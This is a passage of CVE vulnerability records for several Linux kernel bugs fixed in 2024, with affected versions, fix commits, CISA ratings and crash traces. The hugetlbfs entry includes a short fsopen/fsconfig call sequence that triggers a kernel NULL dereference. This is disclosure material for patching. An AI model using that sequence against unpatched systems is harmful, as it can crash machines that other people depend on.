"Exploitation": "none"
},
{
"Automatable": "no"
},
{
"Technical Impact": "partial"
}
],
"role": "CISA Coordinator",
"timestamp": "2024-09-10T15:53:03.970404Z",
"version": "2.0.3"
},
"type": "ssvc"
}
}
],
"providerMetadata": {
"dateUpdated": "2024-09-11T17:33:32.587Z",
"orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
"shortName": "CISA-ADP"
},
"title": "CISA ADP Vulnrichment"
}
],
"cna": {
"affected": [
{
"defaultStatus": "unaffected",
"product": "Linux",
"programFiles": [
"fs/hugetlbfs/inode.c"
],
"repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
"vendor": "Linux",
"versions": [
{
"lessThan": "1dde8ef4b7a749ae1bc73617c91775631d167557",
"status": "affected",
"version": "32021982a324dce93b4ae00c06213bf45fb319c8",
"versionType": "git"
},
{
"lessThan": "80d852299987a8037be145a94f41874228f1a773",
"status": "affected",
"version": "32021982a324dce93b4ae00c06213bf45fb319c8",
"versionType": "git"
},
{
"lessThan": "22850c9950a4e43a67299755d11498f3292d02ff",
"status": "affected",
"version": "32021982a324dce93b4ae00c06213bf45fb319c8",
"versionType": "git"
},
{
"lessThan": "2e2c07104b4904aed1389a59b25799b95a85b5b9",
"status": "affected",
"version": "32021982a324dce93b4ae00c06213bf45fb319c8",
"versionType": "git"
},
{
"lessThan": "13c5a9fb07105557a1fa9efdb4f23d7ef30b7274",
"status": "affected",
"version": "32021982a324dce93b4ae00c06213bf45fb319c8",
"versionType": "git"
},
{
"lessThan": "ec78418801ef7b0c22cd6a30145ec480dd48db39",
"status": "affected",
"version": "32021982a324dce93b4ae00c06213bf45fb319c8",
"versionType": "git"
},
{
"lessThan": "79d72c68c58784a3e1cd2378669d51bfd0cb7498",
"status": "affected",
"version": "32021982a324dce93b4ae00c06213bf45fb319c8",
"versionType": "git"
}
]
},
{
"defaultStatus": "affected",
"product": "Linux",
"programFiles": [
"fs/hugetlbfs/inode.c"
],
"repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
"vendor": "Linux",
"versions": [
{
"status": "affected",
"version": "5.1"
},
{
"lessThan": "5.1",
"status": "unaffected",
"version": "0",
"versionType": "semver"
},
{
"lessThanOrEqual": "5.4.*",
"status": "unaffected",
"version": "5.4.271",
"versionType": "semver"
},
{
"lessThanOrEqual": "5.10.*",
"status": "unaffected",
"version": "5.10.212",
"versionType": "semver"
},
{
"lessThanOrEqual": "5.15.*",
"status": "unaffected",
"version": "5.15.151",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.1.*",
"status": "unaffected",
"version": "6.1.79",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.6.*",
"status": "unaffected",
"version": "6.6.18",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.7.*",
"status": "unaffected",
"version": "6.7.6",
"versionType": "semver"
},
{
"lessThanOrEqual": "*",
"status": "unaffected",
"version": "6.8",
"versionType": "original_commit_for_fix"
}
]
}
],
"cpeApplicability": [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.4.271",
"versionStartIncluding": "5.1",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.10.212",
"versionStartIncluding": "5.1",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.15.151",
"versionStartIncluding": "5.1",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.1.79",
"versionStartIncluding": "5.1",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.6.18",
"versionStartIncluding": "5.1",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.7.6",
"versionStartIncluding": "5.1",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.8",
"versionStartIncluding": "5.1",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
]
}
],
"descriptions": [
{
"lang": "en",
"value": "In the Linux kernel, the following vulnerability has been resolved:\n\nfs,hugetlb: fix NULL pointer dereference in hugetlbs_fill_super\n\nWhen configuring a hugetlb filesystem via the fsconfig() syscall, there is\na possible NULL dereference in hugetlbfs_fill_super() caused by assigning\nNULL to ctx-\u003ehstate in hugetlbfs_parse_param() when the requested pagesize\nis non valid.\n\nE.g: Taking the following steps:\n\n fd = fsopen(\"hugetlbfs\", FSOPEN_CLOEXEC);\n fsconfig(fd, FSCONFIG_SET_STRING, \"pagesize\", \"1024\", 0);\n fsconfig(fd, FSCONFIG_CMD_CREATE, NULL, NULL, 0);\n\nGiven that the requested \"pagesize\" is invalid, ctxt-\u003ehstate will be replaced\nwith NULL, losing its previous value, and we will print an error:\n\n ...\n ...\n case Opt_pagesize:\n ps = memparse(param-\u003estring, \u0026rest);\n ctx-\u003ehstate = h;\n if (!ctx-\u003ehstate) {\n pr_err(\"Unsupported page size %lu MB\\n\", ps / SZ_1M);\n return -EINVAL;\n }\n return 0;\n ...\n ...\n\nThis is a problem because later on, we will dereference ctxt-\u003ehstate in\nhugetlbfs_fill_super()\n\n ...\n ...\n sb-\u003es_blocksize = huge_page_size(ctx-\u003ehstate);\n ...\n ...\n\nCausing below Oops.\n\nFix this by replacing cxt-\u003ehstate value only when then pagesize is known\nto be valid.\n\n kernel: hugetlbfs: Unsupported page size 0 MB\n kernel: BUG: kernel NULL pointer dereference, address: 0000000000000028\n kernel: #PF: supervisor read access in kernel mode\n kernel: #PF: error_code(0x0000) - not-present page\n kernel: PGD 800000010f66c067 P4D 800000010f66c067 PUD 1b22f8067 PMD 0\n kernel: Oops: 0000 [#1] PREEMPT SMP PTI\n kernel: CPU: 4 PID: 5659 Comm: syscall Tainted: G E 6.8.0-rc2-default+ #22 5a47c3fef76212addcc6eb71344aabc35190ae8f\n kernel: Hardware name: Intel Corp. GROVEPORT/GROVEPORT, BIOS GVPRCRB1.86B.0016.D04.1705030402 05/03/2017\n kernel: RIP: 0010:hugetlbfs_fill_super+0xb4/0x1a0\n kernel: Code: 48 8b 3b e8 3e c6 ed ff 48 85 c0 48 89 45 20 0f 84 d6 00 00 00 48 b8 ff ff ff ff ff ff ff 7f 4c 89 e7 49 89 44 24 20 48 8b 03 \u003c8b\u003e 48 28 b8 00 10 00 00 48 d3 e0 49 89 44 24 18 48 8b 03 8b 40 28\n kernel: RSP: 0018:ffffbe9960fcbd48 EFLAGS: 00010246\n kernel: RAX: 0000000000000000 RBX: ffff9af5272ae780 RCX: 0000000000372004\n kernel: RDX: ffffffffffffffff RSI: ffffffffffffffff RDI: ffff9af555e9b000\n kernel: RBP: ffff9af52ee66b00 R08: 0000000000000040 R09: 0000000000370004\n kernel: R10: ffffbe9960fcbd48 R11: 0000000000000040 R12: ffff9af555e9b000\n kernel: R13: ffffffffa66b86c0 R14: ffff9af507d2f400 R15: ffff9af507d2f400\n kernel: FS: 00007ffbc0ba4740(0000) GS:ffff9b0bd7000000(0000) knlGS:0000000000000000\n kernel: CS: 0010 DS: 0000 ES: 0000 CR0: 0000000080050033\n kernel: CR2: 0000000000000028 CR3: 00000001b1ee0000 CR4: 00000000001506f0\n kernel: Call Trace:\n kernel: \u003cTASK\u003e\n kernel: ? __die_body+0x1a/0x60\n kernel: ? page_fault_oops+0x16f/0x4a0\n kernel: ? search_bpf_extables+0x65/0x70\n kernel: ? fixup_exception+0x22/0x310\n kernel: ? exc_page_fault+0x69/0x150\n kernel: ? asm_exc_page_fault+0x22/0x30\n kernel: ? __pfx_hugetlbfs_fill_super+0x10/0x10\n kernel: ? hugetlbfs_fill_super+0xb4/0x1a0\n kernel: ? hugetlbfs_fill_super+0x28/0x1a0\n kernel: ? __pfx_hugetlbfs_fill_super+0x10/0x10\n kernel: vfs_get_super+0x40/0xa0\n kernel: ? __pfx_bpf_lsm_capable+0x10/0x10\n kernel: vfs_get_tree+0x25/0xd0\n kernel: vfs_cmd_create+0x64/0xe0\n kernel: __x64_sys_fsconfig+0x395/0x410\n kernel: do_syscall_64+0x80/0x160\n kernel: ? syscall_exit_to_user_mode+0x82/0x240\n kernel: ? do_syscall_64+0x8d/0x160\n kernel: ? syscall_exit_to_user_mode+0x82/0x240\n kernel: ? do_syscall_64+0x8d/0x160\n kernel: ? exc_page_fault+0x69/0x150\n kernel: entry_SYSCALL_64_after_hwframe+0x6e/0x76\n kernel: RIP: 0033:0x7ffbc0cb87c9\n kernel: Code: 00 90 90 90 90 90 90 90 90 90 90 90 90 90 90 66 90 48 89 f8 48 89 f7 48 89 d6 48 89 ca 4d 89 c2 4d 89 c8 4c 8b 4c 24 08 0f 05 \u003c48\u003e 3d 01 f0 ff ff 73 01 c3 48 8b 0d 97 96 0d 00 f7 d8 64 89 01 48\n kernel: RSP: 002b:00007ffc29d2f388 EFLAGS: 00000206 ORIG_RAX: 00000000000001af\n kernel: RAX: fffffffffff\n---truncated---"
}
],
"providerMetadata": {
"dateUpdated": "2025-05-04T08:54:06.156Z",
"orgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
"shortName": "Linux"
},
"references": [
{
"url": "https://git.kernel.org/stable/c/1dde8ef4b7a749ae1bc73617c91775631d167557"
},
{
"url": "https://git.kernel.org/stable/c/80d852299987a8037be145a94f41874228f1a773"
},
{
"url": "https://git.kernel.org/stable/c/22850c9950a4e43a67299755d11498f3292d02ff"
},
{
"url": "https://git.kernel.org/stable/c/2e2c07104b4904aed1389a59b25799b95a85b5b9"
},
{
"url": "https://git.kernel.org/stable/c/13c5a9fb07105557a1fa9efdb4f23d7ef30b7274"
},
{
"url": "https://git.kernel.org/stable/c/ec78418801ef7b0c22cd6a30145ec480dd48db39"
},
{
"url": "https://git.kernel.org/stable/c/79d72c68c58784a3e1cd2378669d51bfd0cb7498"
}
],
"title": "fs,hugetlb: fix NULL pointer dereference in hugetlbs_fill_super",
"x_generator": {
"engine": "bippy-1.2.0"
}
}
},
"cveMetadata": {
"assignerOrgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
"assignerShortName": "Linux",
"cveId": "CVE-2024-26688",
"datePublished": "2024-04-03T14:54:49.964Z",
"dateReserved": "2024-02-19T14:20:24.154Z",
"dateUpdated": "2025-05-04T08:54:06.156Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.1"
}
CVE-2024-26753 (GCVE-0-2024-26753)
Vulnerability from cvelistv5
Published
2024-04-03 17:00
Modified
2025-05-04 08:55
Severity ?
VLAI Severity ?
EPSS score ?
Summary
In the Linux kernel, the following vulnerability has been resolved:
crypto: virtio/akcipher - Fix stack overflow on memcpy
sizeof(struct virtio_crypto_akcipher_session_para) is less than
sizeof(struct virtio_crypto_op_ctrl_req::u), copying more bytes from
stack variable leads stack overflow. Clang reports this issue by
commands:
make -j CC=clang-14 mrproper >/dev/null 2>&1
make -j O=/tmp/crypto-build CC=clang-14 allmodconfig >/dev/null 2>&1
make -j O=/tmp/crypto-build W=1 CC=clang-14 drivers/crypto/virtio/
virtio_crypto_akcipher_algs.o
References
| URL | Tags | ||||||||||||||||
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
|
|||||||||||||||||
Impacted products
{
"containers": {
"adp": [
{
"providerMetadata": {
"dateUpdated": "2024-08-02T00:14:13.229Z",
"orgId": "af854a3a-2127-422b-91ae-364da2661108",
"shortName": "CVE"
},
"references": [
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/37077ed16c7793e21b005979d33f8a61565b7e86"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/62f361bfea60c6afc3df09c1ad4152e6507f6f47"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/b0365460e945e1117b47cf7329d86de752daff63"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/ef1e47d50324e232d2da484fe55a54274eeb9bc1"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/c0ec2a712daf133d9996a8a1b7ee2d4996080363"
},
{
"tags": [
"x_transferred"
],
"url": "https://lists.debian.org/debian-lts-announce/2024/06/msg00017.html"
}
],
"title": "CVE Program Container"
},
{
"metrics": [
{
"other": {
"content": {
"id": "CVE-2024-26753",
"options": [
{
"Exploitation": "none"
},
{
"Automatable": "no"
},
{
"Technical Impact": "partial"
}
],
"role": "CISA Coordinator",
"timestamp": "2024-09-10T15:51:40.958573Z",
"version": "2.0.3"
},
"type": "ssvc"
}
}
],
"providerMetadata": {
"dateUpdated": "2024-09-11T17:33:15.875Z",
"orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
"shortName": "CISA-ADP"
},
"title": "CISA ADP Vulnrichment"
}
],
"cna": {
"affected": [
{
"defaultStatus": "unaffected",
"product": "Linux",
"programFiles": [
"drivers/crypto/virtio/virtio_crypto_akcipher_algs.c"
],
"repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
"vendor": "Linux",
"versions": [
{
"lessThan": "37077ed16c7793e21b005979d33f8a61565b7e86",
"status": "affected",
"version": "1ff57428894fc4f5001d3df0762c1820295d6c4f",
"versionType": "git"
},
{
"lessThan": "62f361bfea60c6afc3df09c1ad4152e6507f6f47",
"status": "affected",
"version": "59ca6c93387d325e96577d8bd4c23c78c1491c11",
"versionType": "git"
},
{
"lessThan": "b0365460e945e1117b47cf7329d86de752daff63",
"status": "affected",
"version": "59ca6c93387d325e96577d8bd4c23c78c1491c11",
"versionType": "git"
},
{
"lessThan": "ef1e47d50324e232d2da484fe55a54274eeb9bc1",
"status": "affected",
"version": "59ca6c93387d325e96577d8bd4c23c78c1491c11",
"versionType": "git"
},
{
"lessThan": "c0ec2a712daf133d9996a8a1b7ee2d4996080363",
"status": "affected",
"version": "59ca6c93387d325e96577d8bd4c23c78c1491c11",
"versionType": "git"
}
]
},
{
"defaultStatus": "affected",
"product": "Linux",
"programFiles": [
"drivers/crypto/virtio/virtio_crypto_akcipher_algs.c"
],
"repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
"vendor": "Linux",
"versions": [
{
"status": "affected",
"version": "5.18"
},
{
"lessThan": "5.18",
"status": "unaffected",
"version": "0",
"versionType": "semver"
},
{
"lessThanOrEqual": "5.10.*",
"status": "unaffected",
"version": "5.10.212",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.1.*",
"status": "unaffected",
"version": "6.1.80",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.6.*",
"status": "unaffected",
"version": "6.6.19",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.7.*",
"status": "unaffected",
"version": "6.7.7",
"versionType": "semver"
},
{
"lessThanOrEqual": "*",
"status": "unaffected",
"version": "6.8",
"versionType": "original_commit_for_fix"
}
]
}
],
"cpeApplicability": [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.10.212",
"versionStartIncluding": "5.10.209",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.1.80",
"versionStartIncluding": "5.18",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.6.19",
"versionStartIncluding": "5.18",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.7.7",
"versionStartIncluding": "5.18",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.8",
"versionStartIncluding": "5.18",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
]
}
],
"descriptions": [
{
"lang": "en",
"value": "In the Linux kernel, the following vulnerability has been resolved:\n\ncrypto: virtio/akcipher - Fix stack overflow on memcpy\n\nsizeof(struct virtio_crypto_akcipher_session_para) is less than\nsizeof(struct virtio_crypto_op_ctrl_req::u), copying more bytes from\nstack variable leads stack overflow. Clang reports this issue by\ncommands:\nmake -j CC=clang-14 mrproper \u003e/dev/null 2\u003e\u00261\nmake -j O=/tmp/crypto-build CC=clang-14 allmodconfig \u003e/dev/null 2\u003e\u00261\nmake -j O=/tmp/crypto-build W=1 CC=clang-14 drivers/crypto/virtio/\n virtio_crypto_akcipher_algs.o"
}
],
"providerMetadata": {
"dateUpdated": "2025-05-04T08:55:44.222Z",
"orgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
"shortName": "Linux"
},
"references": [
{
"url": "https://git.kernel.org/stable/c/37077ed16c7793e21b005979d33f8a61565b7e86"
},
{
"url": "https://git.kernel.org/stable/c/62f361bfea60c6afc3df09c1ad4152e6507f6f47"
},
{
"url": "https://git.kernel.org/stable/c/b0365460e945e1117b47cf7329d86de752daff63"
},
{
"url": "https://git.kernel.org/stable/c/ef1e47d50324e232d2da484fe55a54274eeb9bc1"
},
{
"url": "https://git.kernel.org/stable/c/c0ec2a712daf133d9996a8a1b7ee2d4996080363"
}
],
"title": "crypto: virtio/akcipher - Fix stack overflow on memcpy",
"x_generator": {
"engine": "bippy-1.2.0"
}
}
},
"cveMetadata": {
"assignerOrgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
"assignerShortName": "Linux",
"cveId": "CVE-2024-26753",
"datePublished": "2024-04-03T17:00:38.148Z",
"dateReserved": "2024-02-19T14:20:24.169Z",
"dateUpdated": "2025-05-04T08:55:44.222Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.1"
}
CVE-2024-26855 (GCVE-0-2024-26855)
Vulnerability from cvelistv5
Published
2024-04-17 10:17
Modified
2025-05-04 08:58
Severity ?
VLAI Severity ?
EPSS score ?
Summary
In the Linux kernel, the following vulnerability has been resolved:
net: ice: Fix potential NULL pointer dereference in ice_bridge_setlink()
The function ice_bridge_setlink() may encounter a NULL pointer dereference
if nlmsg_find_attr() returns NULL and br_spec is dereferenced subsequently
in nla_for_each_nested(). To address this issue, add a check to ensure that
br_spec is not NULL before proceeding with the nested attribute iteration.
References
| URL | Tags | ||||||||||||||||||||||
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
|
|||||||||||||||||||||||
Impacted products
| Vendor | Product | Version | ||
|---|---|---|---|---|
| Linux | Linux |
Version: b1edc14a3fbfe0154a2aecb8bb9775c3012cb6e2 Version: b1edc14a3fbfe0154a2aecb8bb9775c3012cb6e2 Version: b1edc14a3fbfe0154a2aecb8bb9775c3012cb6e2 Version: b1edc14a3fbfe0154a2aecb8bb9775c3012cb6e2 Version: b1edc14a3fbfe0154a2aecb8bb9775c3012cb6e2 Version: b1edc14a3fbfe0154a2aecb8bb9775c3012cb6e2 Version: b1edc14a3fbfe0154a2aecb8bb9775c3012cb6e2 |
||
{
"containers": {
"adp": [
{
"metrics": [
{
"other": {
"content": {
"id": "CVE-2024-26855",
"options": [
{
"Exploitation": "none"
},
{
"Automatable": "no"
},
{
"Technical Impact": "partial"
}
],
"role": "CISA Coordinator",
"timestamp": "2024-04-23T14:02:40.817976Z",
"version": "2.0.3"
},
"type": "ssvc"
}
}
],
"providerMetadata": {
"dateUpdated": "2024-06-04T17:48:40.362Z",
"orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
"shortName": "CISA-ADP"
},
"title": "CISA ADP Vulnrichment"
},
{
"providerMetadata": {
"dateUpdated": "2024-08-02T00:14:13.668Z",
"orgId": "af854a3a-2127-422b-91ae-364da2661108",
"shortName": "CVE"
},
"references": [
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/d9fefc51133107e59d192d773be86c1150cfeebb"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/37fe99016b12d32100ce670216816dba6c48b309"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/8d95465d9a424200485792858c5b3be54658ce19"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/afdd29726a6de4ba27cd15590661424c888dc596"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/1a770927dc1d642b22417c3e668c871689fc58b3"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/0e296067ae0d74a10b4933601f9aa9f0ec8f157f"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/06e456a05d669ca30b224b8ed962421770c1496c"
},
{
"tags": [
"x_transferred"
],
"url": "https://lists.debian.org/debian-lts-announce/2024/06/msg00017.html"
}
],
"title": "CVE Program Container"
}
],
"cna": {
"affected": [
{
"defaultStatus": "unaffected",
"product": "Linux",
"programFiles": [
"drivers/net/ethernet/intel/ice/ice_main.c"
],
"repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
"vendor": "Linux",
"versions": [
{
"lessThan": "d9fefc51133107e59d192d773be86c1150cfeebb",
"status": "affected",
"version": "b1edc14a3fbfe0154a2aecb8bb9775c3012cb6e2",
"versionType": "git"
},
{
"lessThan": "37fe99016b12d32100ce670216816dba6c48b309",
"status": "affected",
"version": "b1edc14a3fbfe0154a2aecb8bb9775c3012cb6e2",
"versionType": "git"
},
{
"lessThan": "8d95465d9a424200485792858c5b3be54658ce19",
"status": "affected",
"version": "b1edc14a3fbfe0154a2aecb8bb9775c3012cb6e2",
"versionType": "git"
},
{
"lessThan": "afdd29726a6de4ba27cd15590661424c888dc596",
"status": "affected",
"version": "b1edc14a3fbfe0154a2aecb8bb9775c3012cb6e2",
"versionType": "git"
},
{
"lessThan": "1a770927dc1d642b22417c3e668c871689fc58b3",
"status": "affected",
"version": "b1edc14a3fbfe0154a2aecb8bb9775c3012cb6e2",
"versionType": "git"
},
{
"lessThan": "0e296067ae0d74a10b4933601f9aa9f0ec8f157f",
"status": "affected",
"version": "b1edc14a3fbfe0154a2aecb8bb9775c3012cb6e2",
"versionType": "git"
},
{
"lessThan": "06e456a05d669ca30b224b8ed962421770c1496c",
"status": "affected",
"version": "b1edc14a3fbfe0154a2aecb8bb9775c3012cb6e2",
"versionType": "git"
}
]
},
{
"defaultStatus": "affected",
"product": "Linux",
"programFiles": [
"drivers/net/ethernet/intel/ice/ice_main.c"
],
"repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
"vendor": "Linux",
"versions": [
{
"status": "affected",
"version": "4.20"
},
{
"lessThan": "4.20",
"status": "unaffected",
"version": "0",
"versionType": "semver"
},
{
"lessThanOrEqual": "5.4.*",
"status": "unaffected",
"version": "5.4.272",
"versionType": "semver"
},
{
"lessThanOrEqual": "5.10.*",
"status": "unaffected",
"version": "5.10.213",
"versionType": "semver"
},
{
"lessThanOrEqual": "5.15.*",
"status": "unaffected",
"version": "5.15.152",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.1.*",
"status": "unaffected",
"version": "6.1.82",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.6.*",
"status": "unaffected",
"version": "6.6.22",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.7.*",
"status": "unaffected",
"version": "6.7.10",
"versionType": "semver"
},
{
"lessThanOrEqual": "*",
"status": "unaffected",
"version": "6.8",
"versionType": "original_commit_for_fix"
}
]
}
],
"cpeApplicability": [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.4.272",
"versionStartIncluding": "4.20",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.10.213",
"versionStartIncluding": "4.20",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.15.152",
"versionStartIncluding": "4.20",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.1.82",
"versionStartIncluding": "4.20",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.6.22",
"versionStartIncluding": "4.20",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.7.10",
"versionStartIncluding": "4.20",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.8",
"versionStartIncluding": "4.20",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
]
}
],
"descriptions": [
{
"lang": "en",
"value": "In the Linux kernel, the following vulnerability has been resolved:\n\nnet: ice: Fix potential NULL pointer dereference in ice_bridge_setlink()\n\nThe function ice_bridge_setlink() may encounter a NULL pointer dereference\nif nlmsg_find_attr() returns NULL and br_spec is dereferenced subsequently\nin nla_for_each_nested(). To address this issue, add a check to ensure that\nbr_spec is not NULL before proceeding with the nested attribute iteration."
}
],
"providerMetadata": {
"dateUpdated": "2025-05-04T08:58:03.566Z",
"orgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
"shortName": "Linux"
},
"references": [
{
"url": "https://git.kernel.org/stable/c/d9fefc51133107e59d192d773be86c1150cfeebb"
},
{
"url": "https://git.kernel.org/stable/c/37fe99016b12d32100ce670216816dba6c48b309"
},
{
"url": "https://git.kernel.org/stable/c/8d95465d9a424200485792858c5b3be54658ce19"
},
{
"url": "https://git.kernel.org/stable/c/afdd29726a6de4ba27cd15590661424c888dc596"
},
{
"url": "https://git.kernel.org/stable/c/1a770927dc1d642b22417c3e668c871689fc58b3"
},
{
"url": "https://git.kernel.org/stable/c/0e296067ae0d74a10b4933601f9aa9f0ec8f157f"
},
{
"url": "https://git.kernel.org/stable/c/06e456a05d669ca30b224b8ed962421770c1496c"
}
],
"title": "net: ice: Fix potential NULL pointer dereference in ice_bridge_setlink()",
"x_generator": {
"engine": "bippy-1.2.0"
}
}
},
"cveMetadata": {
"assignerOrgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
"assignerShortName": "Linux",
"cveId": "CVE-2024-26855",
"datePublished": "2024-04-17T10:17:17.858Z",
"dateReserved": "2024-02-19T14:20:24.183Z",
"dateUpdated": "2025-05-04T08:58:03.566Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.1"
}
CVE-2023-52637 (GCVE-0-2023-52637)
Vulnerability from cvelistv5
Published
2024-04-03 14:54
Modified
2025-05-04 07:40
Severity ?
VLAI Severity ?
EPSS score ?
Summary
In the Linux kernel, the following vulnerability has been resolved:
can: j1939: Fix UAF in j1939_sk_match_filter during setsockopt(SO_J1939_FILTER)
Lock jsk->sk to prevent UAF when setsockopt(..., SO_J1939_FILTER, ...)
modifies jsk->filters while receiving packets.
Following trace was seen on affected system:
==================================================================
BUG: KASAN: slab-use-after-free in j1939_sk_recv_match_one+0x1af/0x2d0 [can_j1939]
Read of size 4 at addr ffff888012144014 by task j1939/350
CPU: 0 PID: 350 Comm: j1939 Tainted: G W OE 6.5.0-rc5 #1
Hardware name: QEMU Standard PC (i440FX + PIIX, 1996), BIOS 1.13.0-1ubuntu1.1 04/01/2014
Call Trace:
print_report+0xd3/0x620
? kasan_complete_mode_report_info+0x7d/0x200
? j1939_sk_recv_match_one+0x1af/0x2d0 [can_j1939]
kasan_report+0xc2/0x100
? j1939_sk_recv_match_one+0x1af/0x2d0 [can_j1939]
__asan_load4+0x84/0xb0
j1939_sk_recv_match_one+0x1af/0x2d0 [can_j1939]
j1939_sk_recv+0x20b/0x320 [can_j1939]
? __kasan_check_write+0x18/0x20
? __pfx_j1939_sk_recv+0x10/0x10 [can_j1939]
? j1939_simple_recv+0x69/0x280 [can_j1939]
? j1939_ac_recv+0x5e/0x310 [can_j1939]
j1939_can_recv+0x43f/0x580 [can_j1939]
? __pfx_j1939_can_recv+0x10/0x10 [can_j1939]
? raw_rcv+0x42/0x3c0 [can_raw]
? __pfx_j1939_can_recv+0x10/0x10 [can_j1939]
can_rcv_filter+0x11f/0x350 [can]
can_receive+0x12f/0x190 [can]
? __pfx_can_rcv+0x10/0x10 [can]
can_rcv+0xdd/0x130 [can]
? __pfx_can_rcv+0x10/0x10 [can]
__netif_receive_skb_one_core+0x13d/0x150
? __pfx___netif_receive_skb_one_core+0x10/0x10
? __kasan_check_write+0x18/0x20
? _raw_spin_lock_irq+0x8c/0xe0
__netif_receive_skb+0x23/0xb0
process_backlog+0x107/0x260
__napi_poll+0x69/0x310
net_rx_action+0x2a1/0x580
? __pfx_net_rx_action+0x10/0x10
? __pfx__raw_spin_lock+0x10/0x10
? handle_irq_event+0x7d/0xa0
__do_softirq+0xf3/0x3f8
do_softirq+0x53/0x80
</IRQ>
<TASK>
__local_bh_enable_ip+0x6e/0x70
netif_rx+0x16b/0x180
can_send+0x32b/0x520 [can]
? __pfx_can_send+0x10/0x10 [can]
? __check_object_size+0x299/0x410
raw_sendmsg+0x572/0x6d0 [can_raw]
? __pfx_raw_sendmsg+0x10/0x10 [can_raw]
? apparmor_socket_sendmsg+0x2f/0x40
? __pfx_raw_sendmsg+0x10/0x10 [can_raw]
sock_sendmsg+0xef/0x100
